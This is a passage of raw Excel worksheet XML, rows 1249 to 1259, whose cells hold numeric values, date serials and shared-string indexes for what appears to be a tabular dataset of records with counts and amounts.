        <v>81314848686</v>
      </c>
      <c r="AQ1249" t="s">
        <v>9281</v>
      </c>
      <c r="AR1249" t="s">
        <v>9282</v>
      </c>
      <c r="AS1249" t="s">
        <v>71</v>
      </c>
      <c r="AT1249" t="s">
        <v>58</v>
      </c>
      <c r="AU1249">
        <v>0</v>
      </c>
      <c r="AV1249">
        <v>0</v>
      </c>
      <c r="AW1249">
        <v>7</v>
      </c>
      <c r="AX1249">
        <v>3</v>
      </c>
      <c r="AY1249">
        <v>5</v>
      </c>
      <c r="AZ1249">
        <v>1</v>
      </c>
      <c r="BA1249" t="s">
        <v>17557</v>
      </c>
      <c r="BB1249">
        <v>0</v>
      </c>
      <c r="BC1249" t="s">
        <v>9550</v>
      </c>
      <c r="BD1249">
        <v>0</v>
      </c>
    </row>
    <row r="1250" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1250">
        <v>5642</v>
      </c>
      <c r="B1250" t="s">
        <v>9283</v>
      </c>
      <c r="C1250" t="s">
        <v>199</v>
      </c>
      <c r="D1250" t="s">
        <v>9284</v>
      </c>
      <c r="E1250" t="s">
        <v>142</v>
      </c>
      <c r="F1250" t="s">
        <v>666</v>
      </c>
      <c r="G1250" s="1">
        <v>44343</v>
      </c>
      <c r="H1250">
        <v>11548</v>
      </c>
      <c r="I1250">
        <v>11548</v>
      </c>
      <c r="J1250">
        <v>1</v>
      </c>
      <c r="K1250">
        <v>0</v>
      </c>
      <c r="L1250">
        <v>2</v>
      </c>
      <c r="M1250">
        <v>3</v>
      </c>
      <c r="N1250">
        <v>0</v>
      </c>
      <c r="O1250">
        <v>0</v>
      </c>
      <c r="P1250">
        <v>0</v>
      </c>
      <c r="Q1250">
        <v>1</v>
      </c>
      <c r="R1250">
        <v>10</v>
      </c>
      <c r="S1250">
        <v>0</v>
      </c>
      <c r="T1250">
        <v>1</v>
      </c>
      <c r="U1250">
        <v>400000</v>
      </c>
      <c r="V1250">
        <v>0</v>
      </c>
      <c r="W1250">
        <v>8000</v>
      </c>
      <c r="X1250">
        <v>3000</v>
      </c>
      <c r="Y1250">
        <v>0</v>
      </c>
      <c r="Z1250">
        <v>0</v>
      </c>
      <c r="AA1250">
        <v>0</v>
      </c>
      <c r="AB1250">
        <v>300</v>
      </c>
      <c r="AC1250">
        <v>7500</v>
      </c>
      <c r="AD1250">
        <v>0</v>
      </c>
      <c r="AE1250">
        <v>1000</v>
      </c>
      <c r="AF1250" t="s">
        <v>9285</v>
      </c>
      <c r="AG1250">
        <v>24442</v>
      </c>
      <c r="AH1250">
        <v>1</v>
      </c>
      <c r="AJ1250">
        <v>5</v>
      </c>
      <c r="AK1250" t="s">
        <v>9286</v>
      </c>
      <c r="AL1250" t="s">
        <v>9287</v>
      </c>
      <c r="AM1250" t="s">
        <v>9288</v>
      </c>
      <c r="AN1250" t="s">
        <v>55</v>
      </c>
      <c r="AO1250">
        <v>2011</v>
      </c>
      <c r="AP1250">
        <v>85260421158</v>
      </c>
      <c r="AQ1250">
        <v>85260421158</v>
      </c>
      <c r="AR1250" t="s">
        <v>9285</v>
      </c>
      <c r="AS1250" t="s">
        <v>71</v>
      </c>
      <c r="AT1250" t="s">
        <v>58</v>
      </c>
      <c r="AU1250">
        <v>6</v>
      </c>
      <c r="AV1250">
        <v>0</v>
      </c>
      <c r="AW1250">
        <v>3</v>
      </c>
      <c r="AX1250">
        <v>20</v>
      </c>
      <c r="AY1250">
        <v>6</v>
      </c>
      <c r="AZ1250">
        <v>3</v>
      </c>
      <c r="BA1250" t="s">
        <v>17721</v>
      </c>
      <c r="BB1250">
        <v>0</v>
      </c>
      <c r="BC1250" t="s">
        <v>11138</v>
      </c>
      <c r="BD1250" t="s">
        <v>14027</v>
      </c>
    </row>
    <row r="1251" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1251">
        <v>5715</v>
      </c>
      <c r="B1251" t="s">
        <v>9289</v>
      </c>
      <c r="C1251" t="s">
        <v>2308</v>
      </c>
      <c r="D1251" t="s">
        <v>4383</v>
      </c>
      <c r="E1251" t="s">
        <v>49</v>
      </c>
      <c r="F1251" t="s">
        <v>9217</v>
      </c>
      <c r="G1251" s="1">
        <v>44358</v>
      </c>
      <c r="H1251">
        <v>11573</v>
      </c>
      <c r="I1251">
        <v>11573</v>
      </c>
      <c r="J1251">
        <v>0</v>
      </c>
      <c r="K1251">
        <v>0</v>
      </c>
      <c r="L1251">
        <v>0</v>
      </c>
      <c r="M1251">
        <v>0</v>
      </c>
      <c r="N1251">
        <v>0</v>
      </c>
      <c r="O1251">
        <v>0</v>
      </c>
      <c r="P1251">
        <v>0</v>
      </c>
      <c r="Q1251">
        <v>5</v>
      </c>
      <c r="R1251">
        <v>2</v>
      </c>
      <c r="S1251">
        <v>0</v>
      </c>
      <c r="T1251">
        <v>1</v>
      </c>
      <c r="U1251">
        <v>0</v>
      </c>
      <c r="V1251">
        <v>0</v>
      </c>
      <c r="W1251">
        <v>0</v>
      </c>
      <c r="X1251">
        <v>0</v>
      </c>
      <c r="Y1251">
        <v>0</v>
      </c>
      <c r="Z1251">
        <v>0</v>
      </c>
      <c r="AA1251">
        <v>0</v>
      </c>
      <c r="AB1251">
        <v>250</v>
      </c>
      <c r="AC1251">
        <v>5000</v>
      </c>
      <c r="AD1251">
        <v>0</v>
      </c>
      <c r="AE1251">
        <v>1000</v>
      </c>
      <c r="AF1251" t="s">
        <v>5049</v>
      </c>
      <c r="AG1251">
        <v>98415</v>
      </c>
      <c r="AH1251">
        <v>33</v>
      </c>
      <c r="AJ1251">
        <v>485</v>
      </c>
      <c r="AK1251" t="s">
        <v>2313</v>
      </c>
      <c r="AL1251" t="s">
        <v>2314</v>
      </c>
      <c r="AM1251" t="s">
        <v>9290</v>
      </c>
      <c r="AN1251" t="s">
        <v>68</v>
      </c>
      <c r="AO1251">
        <v>2020</v>
      </c>
      <c r="AP1251">
        <v>85396948181</v>
      </c>
      <c r="AQ1251" t="s">
        <v>9291</v>
      </c>
      <c r="AR1251" t="s">
        <v>5049</v>
      </c>
      <c r="AS1251" t="s">
        <v>71</v>
      </c>
      <c r="AT1251" t="s">
        <v>72</v>
      </c>
      <c r="AU1251">
        <v>30</v>
      </c>
      <c r="AV1251">
        <v>1</v>
      </c>
      <c r="AW1251">
        <v>0</v>
      </c>
      <c r="AX1251">
        <v>0</v>
      </c>
      <c r="AY1251">
        <v>4</v>
      </c>
      <c r="AZ1251">
        <v>0</v>
      </c>
      <c r="BA1251" t="s">
        <v>17745</v>
      </c>
      <c r="BB1251">
        <v>0</v>
      </c>
      <c r="BC1251" t="s">
        <v>9485</v>
      </c>
      <c r="BD1251">
        <v>0</v>
      </c>
    </row>
    <row r="1252" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1252">
        <v>5699</v>
      </c>
      <c r="B1252" t="s">
        <v>9292</v>
      </c>
      <c r="C1252" t="s">
        <v>477</v>
      </c>
      <c r="D1252" t="s">
        <v>9293</v>
      </c>
      <c r="E1252" t="s">
        <v>300</v>
      </c>
      <c r="F1252" t="s">
        <v>9294</v>
      </c>
      <c r="G1252" s="1">
        <v>44364</v>
      </c>
      <c r="H1252">
        <v>11581</v>
      </c>
      <c r="I1252">
        <v>11581</v>
      </c>
      <c r="J1252">
        <v>3</v>
      </c>
      <c r="K1252">
        <v>1</v>
      </c>
      <c r="L1252">
        <v>4</v>
      </c>
      <c r="M1252">
        <v>0</v>
      </c>
      <c r="N1252">
        <v>0</v>
      </c>
      <c r="O1252">
        <v>0</v>
      </c>
      <c r="P1252">
        <v>0</v>
      </c>
      <c r="Q1252">
        <v>0</v>
      </c>
      <c r="R1252">
        <v>0</v>
      </c>
      <c r="S1252">
        <v>0</v>
      </c>
      <c r="T1252">
        <v>1</v>
      </c>
      <c r="U1252">
        <v>600000</v>
      </c>
      <c r="V1252">
        <v>1000</v>
      </c>
      <c r="W1252">
        <v>20000</v>
      </c>
      <c r="X1252">
        <v>0</v>
      </c>
      <c r="Y1252">
        <v>0</v>
      </c>
      <c r="Z1252">
        <v>0</v>
      </c>
      <c r="AA1252">
        <v>0</v>
      </c>
      <c r="AB1252">
        <v>0</v>
      </c>
      <c r="AC1252">
        <v>0</v>
      </c>
      <c r="AD1252">
        <v>0</v>
      </c>
      <c r="AE1252">
        <v>50000</v>
      </c>
      <c r="AF1252" t="s">
        <v>3550</v>
      </c>
      <c r="AG1252">
        <v>95545</v>
      </c>
      <c r="AH1252">
        <v>29</v>
      </c>
      <c r="AJ1252">
        <v>383</v>
      </c>
      <c r="AK1252" t="s">
        <v>1339</v>
      </c>
      <c r="AL1252" t="s">
        <v>9295</v>
      </c>
      <c r="AM1252" t="s">
        <v>9296</v>
      </c>
      <c r="AN1252" t="s">
        <v>55</v>
      </c>
      <c r="AO1252">
        <v>2020</v>
      </c>
      <c r="AP1252" t="s">
        <v>9297</v>
      </c>
      <c r="AQ1252" t="s">
        <v>9298</v>
      </c>
      <c r="AR1252" t="s">
        <v>9299</v>
      </c>
      <c r="AS1252" t="s">
        <v>71</v>
      </c>
      <c r="AT1252" t="s">
        <v>58</v>
      </c>
      <c r="AU1252">
        <v>25</v>
      </c>
      <c r="AV1252">
        <v>1</v>
      </c>
      <c r="AW1252">
        <v>30</v>
      </c>
      <c r="AX1252">
        <v>20</v>
      </c>
      <c r="AY1252">
        <v>20</v>
      </c>
      <c r="AZ1252">
        <v>15</v>
      </c>
      <c r="BA1252" t="s">
        <v>17743</v>
      </c>
      <c r="BB1252">
        <v>0</v>
      </c>
      <c r="BC1252" t="s">
        <v>9550</v>
      </c>
      <c r="BD1252" t="s">
        <v>14032</v>
      </c>
    </row>
    <row r="1253" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1253">
        <v>5734</v>
      </c>
      <c r="B1253" t="s">
        <v>9300</v>
      </c>
      <c r="C1253" t="s">
        <v>2308</v>
      </c>
      <c r="D1253" t="s">
        <v>9301</v>
      </c>
      <c r="E1253" t="s">
        <v>49</v>
      </c>
      <c r="F1253" t="s">
        <v>9217</v>
      </c>
      <c r="G1253" s="1">
        <v>44358</v>
      </c>
      <c r="H1253">
        <v>11652</v>
      </c>
      <c r="I1253">
        <v>11652</v>
      </c>
      <c r="J1253">
        <v>0</v>
      </c>
      <c r="K1253">
        <v>0</v>
      </c>
      <c r="L1253">
        <v>0</v>
      </c>
      <c r="M1253">
        <v>0</v>
      </c>
      <c r="N1253">
        <v>0</v>
      </c>
      <c r="O1253">
        <v>0</v>
      </c>
      <c r="P1253">
        <v>0</v>
      </c>
      <c r="Q1253">
        <v>3</v>
      </c>
      <c r="R1253">
        <v>8</v>
      </c>
      <c r="S1253">
        <v>0</v>
      </c>
      <c r="T1253">
        <v>1</v>
      </c>
      <c r="U1253">
        <v>0</v>
      </c>
      <c r="V1253">
        <v>0</v>
      </c>
      <c r="W1253">
        <v>0</v>
      </c>
      <c r="X1253">
        <v>0</v>
      </c>
      <c r="Y1253">
        <v>0</v>
      </c>
      <c r="Z1253">
        <v>0</v>
      </c>
      <c r="AA1253">
        <v>0</v>
      </c>
      <c r="AB1253">
        <v>600</v>
      </c>
      <c r="AC1253">
        <v>5000</v>
      </c>
      <c r="AD1253">
        <v>0</v>
      </c>
      <c r="AE1253">
        <v>1000</v>
      </c>
      <c r="AF1253" t="s">
        <v>9302</v>
      </c>
      <c r="AG1253">
        <v>98411</v>
      </c>
      <c r="AH1253">
        <v>33</v>
      </c>
      <c r="AJ1253">
        <v>485</v>
      </c>
      <c r="AK1253" t="s">
        <v>9219</v>
      </c>
      <c r="AL1253" t="s">
        <v>9220</v>
      </c>
      <c r="AM1253" t="s">
        <v>9303</v>
      </c>
      <c r="AN1253" t="s">
        <v>68</v>
      </c>
      <c r="AO1253">
        <v>2007</v>
      </c>
      <c r="AP1253" t="s">
        <v>9304</v>
      </c>
      <c r="AQ1253" t="s">
        <v>9305</v>
      </c>
      <c r="AR1253" t="s">
        <v>9302</v>
      </c>
      <c r="AS1253" t="s">
        <v>71</v>
      </c>
      <c r="AT1253" t="s">
        <v>72</v>
      </c>
      <c r="AU1253">
        <v>25</v>
      </c>
      <c r="AV1253">
        <v>0</v>
      </c>
      <c r="AW1253">
        <v>2</v>
      </c>
      <c r="AX1253">
        <v>0</v>
      </c>
      <c r="AY1253">
        <v>4</v>
      </c>
      <c r="AZ1253">
        <v>2</v>
      </c>
      <c r="BA1253" t="s">
        <v>17746</v>
      </c>
      <c r="BB1253">
        <v>0</v>
      </c>
      <c r="BC1253" t="s">
        <v>10323</v>
      </c>
      <c r="BD1253">
        <v>0</v>
      </c>
    </row>
    <row r="1254" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1254">
        <v>5755</v>
      </c>
      <c r="B1254" t="s">
        <v>9306</v>
      </c>
      <c r="C1254" t="s">
        <v>2760</v>
      </c>
      <c r="D1254" t="s">
        <v>9307</v>
      </c>
      <c r="E1254" t="s">
        <v>363</v>
      </c>
      <c r="F1254" t="s">
        <v>364</v>
      </c>
      <c r="G1254" s="1">
        <v>44375</v>
      </c>
      <c r="H1254">
        <v>11733</v>
      </c>
      <c r="I1254">
        <v>11733</v>
      </c>
      <c r="J1254">
        <v>0</v>
      </c>
      <c r="K1254">
        <v>0</v>
      </c>
      <c r="L1254">
        <v>0</v>
      </c>
      <c r="M1254">
        <v>0</v>
      </c>
      <c r="N1254">
        <v>0</v>
      </c>
      <c r="O1254">
        <v>0</v>
      </c>
      <c r="P1254">
        <v>0</v>
      </c>
      <c r="Q1254">
        <v>0</v>
      </c>
      <c r="R1254">
        <v>0</v>
      </c>
      <c r="S1254">
        <v>0</v>
      </c>
      <c r="T1254">
        <v>1</v>
      </c>
      <c r="U1254">
        <v>0</v>
      </c>
      <c r="V1254">
        <v>0</v>
      </c>
      <c r="W1254">
        <v>0</v>
      </c>
      <c r="X1254">
        <v>0</v>
      </c>
      <c r="Y1254">
        <v>0</v>
      </c>
      <c r="Z1254">
        <v>0</v>
      </c>
      <c r="AA1254">
        <v>0</v>
      </c>
      <c r="AB1254">
        <v>0</v>
      </c>
      <c r="AC1254">
        <v>0</v>
      </c>
      <c r="AD1254">
        <v>0</v>
      </c>
      <c r="AE1254">
        <v>50000</v>
      </c>
      <c r="AF1254" t="s">
        <v>9308</v>
      </c>
      <c r="AG1254">
        <v>84180</v>
      </c>
      <c r="AH1254">
        <v>18</v>
      </c>
      <c r="AJ1254">
        <v>288</v>
      </c>
      <c r="AK1254" t="s">
        <v>9309</v>
      </c>
      <c r="AL1254" t="s">
        <v>9310</v>
      </c>
      <c r="AM1254" t="s">
        <v>9311</v>
      </c>
      <c r="AN1254" t="s">
        <v>55</v>
      </c>
      <c r="AO1254">
        <v>2021</v>
      </c>
      <c r="AP1254">
        <v>85233413104</v>
      </c>
      <c r="AQ1254" t="s">
        <v>9312</v>
      </c>
      <c r="AR1254" t="s">
        <v>9308</v>
      </c>
      <c r="AS1254" t="s">
        <v>371</v>
      </c>
      <c r="AT1254" t="s">
        <v>58</v>
      </c>
      <c r="AU1254">
        <v>22</v>
      </c>
      <c r="AV1254">
        <v>1</v>
      </c>
      <c r="AW1254">
        <v>9</v>
      </c>
      <c r="AX1254">
        <v>2</v>
      </c>
      <c r="AY1254">
        <v>4</v>
      </c>
      <c r="AZ1254">
        <v>1</v>
      </c>
      <c r="BA1254" t="s">
        <v>17748</v>
      </c>
      <c r="BB1254" t="s">
        <v>17750</v>
      </c>
      <c r="BC1254" t="s">
        <v>9536</v>
      </c>
      <c r="BD1254" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1255" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1255">
        <v>5766</v>
      </c>
      <c r="B1255" t="s">
        <v>7347</v>
      </c>
      <c r="C1255" t="s">
        <v>99</v>
      </c>
      <c r="D1255" t="s">
        <v>9313</v>
      </c>
      <c r="E1255" t="s">
        <v>142</v>
      </c>
      <c r="F1255" t="s">
        <v>9314</v>
      </c>
      <c r="G1255" s="1">
        <v>44347</v>
      </c>
      <c r="H1255">
        <v>11741</v>
      </c>
      <c r="I1255">
        <v>11741</v>
      </c>
      <c r="J1255">
        <v>1</v>
      </c>
      <c r="K1255">
        <v>0</v>
      </c>
      <c r="L1255">
        <v>1</v>
      </c>
      <c r="M1255">
        <v>0</v>
      </c>
      <c r="N1255">
        <v>0</v>
      </c>
      <c r="O1255">
        <v>0</v>
      </c>
      <c r="P1255">
        <v>0</v>
      </c>
      <c r="Q1255">
        <v>0</v>
      </c>
      <c r="R1255">
        <v>0</v>
      </c>
      <c r="S1255">
        <v>1</v>
      </c>
      <c r="T1255">
        <v>0</v>
      </c>
      <c r="U1255">
        <v>300000</v>
      </c>
      <c r="V1255">
        <v>0</v>
      </c>
      <c r="W1255">
        <v>50000</v>
      </c>
      <c r="X1255">
        <v>0</v>
      </c>
      <c r="Y1255">
        <v>0</v>
      </c>
      <c r="Z1255">
        <v>0</v>
      </c>
      <c r="AA1255">
        <v>0</v>
      </c>
      <c r="AB1255">
        <v>0</v>
      </c>
      <c r="AC1255">
        <v>0</v>
      </c>
      <c r="AD1255">
        <v>1</v>
      </c>
      <c r="AE1255">
        <v>0</v>
      </c>
      <c r="AF1255" t="s">
        <v>7349</v>
      </c>
      <c r="AG1255">
        <v>14440</v>
      </c>
      <c r="AH1255">
        <v>12</v>
      </c>
      <c r="AJ1255">
        <v>160</v>
      </c>
      <c r="AK1255" t="s">
        <v>114</v>
      </c>
      <c r="AL1255" t="s">
        <v>114</v>
      </c>
      <c r="AM1255" t="s">
        <v>9315</v>
      </c>
      <c r="AN1255" t="s">
        <v>55</v>
      </c>
      <c r="AO1255">
        <v>2018</v>
      </c>
      <c r="AP1255">
        <v>85394162480</v>
      </c>
      <c r="AQ1255" t="s">
        <v>7351</v>
      </c>
      <c r="AR1255" t="s">
        <v>7351</v>
      </c>
      <c r="AS1255" t="s">
        <v>179</v>
      </c>
      <c r="AT1255" t="s">
        <v>58</v>
      </c>
      <c r="AU1255">
        <v>24</v>
      </c>
      <c r="AV1255">
        <v>0</v>
      </c>
      <c r="AW1255">
        <v>0</v>
      </c>
      <c r="AX1255">
        <v>0</v>
      </c>
      <c r="AY1255">
        <v>17</v>
      </c>
      <c r="AZ1255">
        <v>6</v>
      </c>
      <c r="BA1255" t="s">
        <v>17448</v>
      </c>
      <c r="BB1255">
        <v>0</v>
      </c>
      <c r="BC1255" t="s">
        <v>13739</v>
      </c>
      <c r="BD1255">
        <v>0</v>
      </c>
    </row>
    <row r="1256" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1256">
        <v>5620</v>
      </c>
      <c r="B1256" t="s">
        <v>9316</v>
      </c>
      <c r="C1256" t="s">
        <v>3165</v>
      </c>
      <c r="D1256" t="s">
        <v>9317</v>
      </c>
      <c r="E1256" t="s">
        <v>111</v>
      </c>
      <c r="F1256" t="s">
        <v>9318</v>
      </c>
      <c r="G1256" s="1">
        <v>44369</v>
      </c>
      <c r="H1256">
        <v>11750</v>
      </c>
      <c r="I1256">
        <v>11750</v>
      </c>
      <c r="J1256">
        <v>2</v>
      </c>
      <c r="K1256">
        <v>0</v>
      </c>
      <c r="L1256">
        <v>2</v>
      </c>
      <c r="M1256">
        <v>2</v>
      </c>
      <c r="N1256">
        <v>0</v>
      </c>
      <c r="O1256">
        <v>0</v>
      </c>
      <c r="P1256">
        <v>0</v>
      </c>
      <c r="Q1256">
        <v>2</v>
      </c>
      <c r="R1256">
        <v>0</v>
      </c>
      <c r="S1256">
        <v>0</v>
      </c>
      <c r="T1256">
        <v>1</v>
      </c>
      <c r="U1256">
        <v>100</v>
      </c>
      <c r="V1256">
        <v>0</v>
      </c>
      <c r="W1256">
        <v>2</v>
      </c>
      <c r="X1256">
        <v>1</v>
      </c>
      <c r="Y1256">
        <v>0</v>
      </c>
      <c r="Z1256">
        <v>0</v>
      </c>
      <c r="AA1256">
        <v>0</v>
      </c>
      <c r="AB1256">
        <v>50</v>
      </c>
      <c r="AC1256">
        <v>0</v>
      </c>
      <c r="AD1256">
        <v>0</v>
      </c>
      <c r="AE1256">
        <v>2</v>
      </c>
      <c r="AF1256" t="s">
        <v>9319</v>
      </c>
      <c r="AG1256">
        <v>99963</v>
      </c>
      <c r="AH1256">
        <v>34</v>
      </c>
      <c r="AJ1256">
        <v>494</v>
      </c>
      <c r="AK1256" t="s">
        <v>9320</v>
      </c>
      <c r="AL1256" t="s">
        <v>9321</v>
      </c>
      <c r="AM1256" t="s">
        <v>9322</v>
      </c>
      <c r="AN1256" t="s">
        <v>55</v>
      </c>
      <c r="AO1256">
        <v>2021</v>
      </c>
      <c r="AP1256">
        <v>82249837575</v>
      </c>
      <c r="AQ1256">
        <v>82249837575</v>
      </c>
      <c r="AR1256" t="s">
        <v>9319</v>
      </c>
      <c r="AS1256" t="s">
        <v>71</v>
      </c>
      <c r="AT1256" t="s">
        <v>58</v>
      </c>
      <c r="AU1256">
        <v>30</v>
      </c>
      <c r="AV1256">
        <v>0</v>
      </c>
      <c r="AW1256">
        <v>9</v>
      </c>
      <c r="AX1256">
        <v>5</v>
      </c>
      <c r="AY1256">
        <v>1</v>
      </c>
      <c r="AZ1256">
        <v>1</v>
      </c>
      <c r="BA1256" t="s">
        <v>17709</v>
      </c>
      <c r="BB1256">
        <v>0</v>
      </c>
      <c r="BC1256" t="s">
        <v>9536</v>
      </c>
      <c r="BD1256" t="s">
        <v>10858</v>
      </c>
    </row>
    <row r="1257" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1257">
        <v>5774</v>
      </c>
      <c r="B1257" t="s">
        <v>9323</v>
      </c>
      <c r="C1257" t="s">
        <v>318</v>
      </c>
      <c r="D1257" t="s">
        <v>9324</v>
      </c>
      <c r="E1257" t="s">
        <v>131</v>
      </c>
      <c r="F1257" t="s">
        <v>9325</v>
      </c>
      <c r="G1257" s="1">
        <v>44369</v>
      </c>
      <c r="H1257">
        <v>11797</v>
      </c>
      <c r="I1257">
        <v>11797</v>
      </c>
      <c r="J1257">
        <v>0</v>
      </c>
      <c r="K1257">
        <v>0</v>
      </c>
      <c r="L1257">
        <v>0</v>
      </c>
      <c r="M1257">
        <v>0</v>
      </c>
      <c r="N1257">
        <v>0</v>
      </c>
      <c r="O1257">
        <v>0</v>
      </c>
      <c r="P1257">
        <v>0</v>
      </c>
      <c r="Q1257">
        <v>0</v>
      </c>
      <c r="R1257">
        <v>5</v>
      </c>
      <c r="S1257">
        <v>0</v>
      </c>
      <c r="T1257">
        <v>5</v>
      </c>
      <c r="U1257">
        <v>0</v>
      </c>
      <c r="V1257">
        <v>0</v>
      </c>
      <c r="W1257">
        <v>0</v>
      </c>
      <c r="X1257">
        <v>0</v>
      </c>
      <c r="Y1257">
        <v>0</v>
      </c>
      <c r="Z1257">
        <v>0</v>
      </c>
      <c r="AA1257">
        <v>0</v>
      </c>
      <c r="AB1257">
        <v>0</v>
      </c>
      <c r="AC1257">
        <v>60000</v>
      </c>
      <c r="AD1257">
        <v>0</v>
      </c>
      <c r="AE1257">
        <v>150000</v>
      </c>
      <c r="AF1257" t="s">
        <v>9326</v>
      </c>
      <c r="AG1257">
        <v>90553</v>
      </c>
      <c r="AH1257">
        <v>26</v>
      </c>
      <c r="AJ1257">
        <v>406</v>
      </c>
      <c r="AK1257" t="s">
        <v>8322</v>
      </c>
      <c r="AL1257" t="s">
        <v>9327</v>
      </c>
      <c r="AM1257" t="s">
        <v>9328</v>
      </c>
      <c r="AN1257" t="s">
        <v>55</v>
      </c>
      <c r="AO1257">
        <v>2020</v>
      </c>
      <c r="AP1257" t="s">
        <v>9329</v>
      </c>
      <c r="AQ1257" t="s">
        <v>9330</v>
      </c>
      <c r="AR1257" t="s">
        <v>9331</v>
      </c>
      <c r="AS1257" t="s">
        <v>371</v>
      </c>
      <c r="AT1257" t="s">
        <v>58</v>
      </c>
      <c r="AU1257">
        <v>72</v>
      </c>
      <c r="AV1257">
        <v>2</v>
      </c>
      <c r="AW1257">
        <v>13</v>
      </c>
      <c r="AX1257">
        <v>3</v>
      </c>
      <c r="AY1257">
        <v>4</v>
      </c>
      <c r="AZ1257">
        <v>3</v>
      </c>
      <c r="BA1257" t="s">
        <v>17654</v>
      </c>
      <c r="BB1257">
        <v>0</v>
      </c>
      <c r="BC1257" t="s">
        <v>9536</v>
      </c>
      <c r="BD1257" t="s">
        <v>14113</v>
      </c>
    </row>
    <row r="1258" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1258">
        <v>5754</v>
      </c>
      <c r="B1258" t="s">
        <v>9332</v>
      </c>
      <c r="C1258" t="s">
        <v>2308</v>
      </c>
      <c r="D1258" t="s">
        <v>9333</v>
      </c>
      <c r="E1258" t="s">
        <v>49</v>
      </c>
      <c r="F1258" t="s">
        <v>9217</v>
      </c>
      <c r="G1258" s="1">
        <v>44356</v>
      </c>
      <c r="H1258">
        <v>11839</v>
      </c>
      <c r="I1258">
        <v>11839</v>
      </c>
      <c r="J1258">
        <v>0</v>
      </c>
      <c r="K1258">
        <v>0</v>
      </c>
      <c r="L1258">
        <v>0</v>
      </c>
      <c r="M1258">
        <v>0</v>
      </c>
      <c r="N1258">
        <v>0</v>
      </c>
      <c r="O1258">
        <v>0</v>
      </c>
      <c r="P1258">
        <v>0</v>
      </c>
      <c r="Q1258">
        <v>3</v>
      </c>
      <c r="R1258">
        <v>5</v>
      </c>
      <c r="S1258">
        <v>0</v>
      </c>
      <c r="T1258">
        <v>1</v>
      </c>
      <c r="U1258">
        <v>0</v>
      </c>
      <c r="V1258">
        <v>0</v>
      </c>
      <c r="W1258">
        <v>0</v>
      </c>
      <c r="X1258">
        <v>0</v>
      </c>
      <c r="Y1258">
        <v>0</v>
      </c>
      <c r="Z1258">
        <v>0</v>
      </c>
      <c r="AA1258">
        <v>0</v>
      </c>
      <c r="AB1258">
        <v>500</v>
      </c>
      <c r="AC1258">
        <v>2000</v>
      </c>
      <c r="AD1258">
        <v>0</v>
      </c>
      <c r="AE1258">
        <v>1000</v>
      </c>
      <c r="AF1258" t="s">
        <v>9334</v>
      </c>
      <c r="AG1258">
        <v>98413</v>
      </c>
      <c r="AH1258">
        <v>33</v>
      </c>
      <c r="AJ1258">
        <v>485</v>
      </c>
      <c r="AK1258" t="s">
        <v>9335</v>
      </c>
      <c r="AL1258" t="s">
        <v>9336</v>
      </c>
      <c r="AM1258" t="s">
        <v>9337</v>
      </c>
      <c r="AN1258" t="s">
        <v>68</v>
      </c>
      <c r="AO1258">
        <v>2007</v>
      </c>
      <c r="AP1258" t="s">
        <v>9338</v>
      </c>
      <c r="AQ1258" t="s">
        <v>9339</v>
      </c>
      <c r="AR1258" t="s">
        <v>9334</v>
      </c>
      <c r="AS1258" t="s">
        <v>57</v>
      </c>
      <c r="AT1258" t="s">
        <v>72</v>
      </c>
      <c r="AU1258">
        <v>30</v>
      </c>
      <c r="AV1258">
        <v>1</v>
      </c>
      <c r="AW1258">
        <v>2</v>
      </c>
      <c r="AX1258">
        <v>0</v>
      </c>
      <c r="AY1258">
        <v>3</v>
      </c>
      <c r="AZ1258">
        <v>1</v>
      </c>
      <c r="BA1258" t="s">
        <v>17747</v>
      </c>
      <c r="BB1258">
        <v>0</v>
      </c>
      <c r="BC1258" t="s">
        <v>9485</v>
      </c>
      <c r="BD1258">
        <v>0</v>
      </c>
    </row>
    <row r="1259" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1259">
        <v>5772</v>
      </c>
      <c r="B1259" t="s">
        <v>9340</v>
      </c>
      <c r="C1259" t="s">
        <v>99</v>
      </c>
      <c r="D1259" t="s">
        <v>9341</v>
      </c>
      <c r="E1259" t="s">
        <v>142</v>
      </c>
      <c r="F1259" t="s">
        <v>4614</v>
      </c>
      <c r="G1259" s="1">
        <v>44369</v>
      </c>
      <c r="H1259">
        <v>11862</v>
      </c>
      <c r="I1259">
        <v>11862</v>
      </c>
      <c r="J1259">
        <v>4</v>
      </c>
      <c r="K1259">
        <v>4</v>
      </c>
      <c r="L1259">
        <v>1</v>
      </c>
      <c r="M1259">
        <v>0</v>
      </c>
      <c r="N1259">
        <v>0</v>
      </c>
      <c r="O1259">
        <v>0</v>
      </c>
      <c r="P1259">
        <v>0</v>
      </c>
      <c r="Q1259">
        <v>0</v>
      </c>
      <c r="R1259">
        <v>0</v>
      </c>
      <c r="S1259">
        <v>0</v>
      </c>
      <c r="T1259">
        <v>0</v>
      </c>
      <c r="U1259">
        <v>15</v>
      </c>
      <c r="V1259">
        <v>4</v>
      </c>
      <c r="W1259">
        <v>3</v>
      </c>
      <c r="X1259">
        <v>0</v>
      </c>
      <c r="Y1259">
        <v>0</v>
      </c>
      <c r="Z1259">
        <v>0</v>
      </c>
      <c r="AA1259">
        <v>0</v>
      </c>
      <c r="AB1259">
        <v>0</v>
      </c>
      <c r="AC1259">
        <v>0</v>
      </c>
      <c r="AD1259">
        <v>0</v>
      </c>
      <c r="AE1259">
        <v>0</v>
      </c>
      <c r="AF1259" t="s">
        <v>9342</v>
      </c>
      <c r="AG1259">
        <v>14440</v>
      </c>
      <c r="AH1259">
        <v>12</v>
      </c>
      <c r="AJ1259">
        <v>160</v>
      </c>
      <c r="AK1259" t="s">
        <v>114</v>
      </c>
      <c r="AL1259" t="s">
        <v>114</v>
      </c>
      <c r="AM1259" t="s">
        <v>9343</v>
      </c>
      <c r="AN1259" t="s">
        <v>55</v>
      </c>
      <c r="AO1259">
        <v>2020</v>
      </c>
      <c r="AP1259" t="s">
        <v>623</v>
      </c>
      <c r="AQ1259" t="s">
        <v>9344</v>
      </c>
      <c r="AR1259" t="s">
        <v>9342</v>
      </c>
      <c r="AS1259" t="s">
        <v>179</v>
      </c>
      <c r="AT1259" t="s">
        <v>58</v>
      </c>
      <c r="AU1259">
        <v>0</v>
